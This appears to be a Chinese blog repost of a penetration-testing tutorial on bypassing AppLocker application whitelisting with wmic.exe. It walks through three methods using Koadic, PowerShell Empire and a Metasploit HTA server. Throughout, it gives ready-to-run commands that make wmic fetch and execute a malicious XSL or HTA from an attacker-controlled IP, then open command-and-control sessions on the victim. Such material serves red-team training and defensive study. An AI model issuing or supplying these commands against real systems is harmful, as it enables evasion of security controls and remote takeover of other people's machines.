• 使用wmic.exe绕过应用程序白名单

    这篇文章的目的是演示将AppLocker旁路列入白名单的最常见和最熟悉的技术。众所周知,出于安全原因,系统管理员添加了组策略来限制本地用户执行应用程序。在上一篇文章中,我们讨论了“ Windows Applocker策略-入门指南 ”,因为它们定义了应用程序控制策略的AppLocker规则以及如何使用它们。但是今天,您将学习如何使用wmic.exe绕过Applocker策略。

    表中的内容

    Wmic.exe简介

    开发技术

    • Koadic
    • Powershell Empire
    • 在XSL代码中链接hta
    Wmic.exe

    WMIC实用程序是一种Microsoft工具,提供了WMI命令行界面,该界面用于本地和远程计算机的各种管理功能,还用于WMIC查询,例如系统设置,停止进程以及在本地或远程运行脚本。因此,它可以调用XSL脚本(可扩展样式表语言)。

    开发技术
    Koadic

    我们将在koadic的帮助下生成一个恶意XSL文件,koadic是一个与Metasploit和Powershell Empire非常相似的命令和控制工具。

    要了解koadic的工作原理,请从此处阅读我们的文章https : //www.hackingarticles.in/koadic-com-command-control-framework/

    安装完成后,您可以运行  ./koadic  文件来启动koadic,并通过运行以下命令并设置SRVHOST来启动staged / js / wmic stager,并设置stager应该将其作为主目录。

    use stager/js/wmic

    set SRVHOST 192.168.1.107

    run

    执行以下WMIC命令以从远程服务器下载并运行恶意XSL文件:

    wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

    一旦恶意XSL文件将在目标计算机上执行,您将拥有与Metasploit一样的Zombie连接。

    PowerShell Empire

    对于我们的wmic Attack的下一种方法,我们将使用Empire。Empire是一个开发后的框架。到目前为止,我们已经将xsl钉与Metasploit配对,但是在这种方法中,我们将使用empire框架。它仅仅是基于python的PowerShell Windows代理,因此非常有用。Empire是由@ harmj0y,@ sixdub,@ enigma0x3,rvrsh3ll,@ killswitch_gui和@xorrior开发的。您可以从此处下载此框架

    要获得《Empire》的基本指南,请访问我们介绍帝国的文章:

    https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

    empire框架启动后,键入listener来检查是否有任何活动的监听器。正如您在下图中所看到的,没有活动的侦听器。所以要设置一个监听器类型:

    listeners

    uselistner http

    set Host http://192.168.1.107

    execute

    使用以上命令,您将拥有一个活动的侦听器。键入回来以退出侦听器,以便您可以启动PowerShell。

    对于wmic攻击,我们将使用舞台游戏。empire中的登台者是一段代码,可让我们的恶意代码通过受感染主机上的代理运行。因此,对于这种类型:

    usestager windows/launcher_xsl

    set Listener http

    execute

    Usestager将创建一个恶意代码文件,该文件将保存在名为launcher.xsl的/ tmp中。

    我们已经使用python HTTP服务器在受害者的机器内传输此文件

    一旦文件运行,我们将在侦听器上得到结果。通过键入以下命令在受害者计算机上运行文件:

    wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

    要查看是否有任何会话打开,请键入“ agents”。这样做将为您显示会话名称。要访问该会话,请输入:

    interact Z639YHPA

    sysinfo

    在XSL代码中链接hta

    众所周知,wmic可以远程执行任何文件或脚本,因此我们将在XSL代码内链接一个hta文件。XSL文件将包含一个链接,该链接用于通过mshta.exe下载并执行恶意的hta文件,该文件由wmic正式触发。

    因此,让我们在Metasploit的帮助下生成一个hta文件:

    use exploit/windows/misc/hta_server

    msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109

    msf exploit(windows/misc/hta_server) > exploit

    现在,复制URL并将其放置在XSL代码中,因为它们具有执行Microsoft语言脚本的能力。

    然后,我们创建了一个“ payload.xsl”文件,您可以从此链接 获取帮助以编写XSL代码,然后放置hta文件的链接,如下所示。

    现在,我们再次需要通过wmic.exe在以下命令的帮助下执行XSL文件:

    wmic os get /FORMAT:"http://192.168.1.109/payload.xsl"

    执行以上命令后,您将打开一个会话。要访问会话,请输入:

    sessions 1
  • 相关阅读:
    Dialog 不能全屏,左右有间距解决方案
    mac apktool配置
    HTML5网站如何做到完全不需要jQuery
    js中控制小数点的显示位数的技术整理
    ASP.NET后台获取cookie中文乱码解决办法
    javascript删除元素节点
    js获取不到动态添加的标签的值的解决方法
    JS常用方法函数整理
    JS获取当前页面的URL信息
    轻轻松松 用U盘安装WIN7
  • 原文地址:https://www.cnblogs.com/sup3rman/p/13743808.html
Copyright © 2020-2023  润新知